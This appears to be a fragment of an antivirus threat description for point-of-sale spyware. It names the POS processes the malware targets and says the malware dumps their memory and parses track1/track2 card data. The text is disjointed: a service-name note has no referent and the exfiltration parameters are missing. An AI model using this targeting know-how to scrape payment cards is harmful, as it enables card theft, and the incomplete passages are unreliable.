This spyware checks for the presence of the following process(es):

  • PosW32.exe
  • sell_it.exe
  • pamserver.exe

NOTES:

where {Service Name} could be any of the following:

  • Retalix
  • CiscoService

If the above process is found running in the system, the malware dumps the process's memory. It parse the characters "=" and ":", which are used as separators in track1/track2 data to check for credit card information stored.

It sends the gathered information using SQL tool with the following parameters:

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must disable System Restore to allow full scanning of their computers.
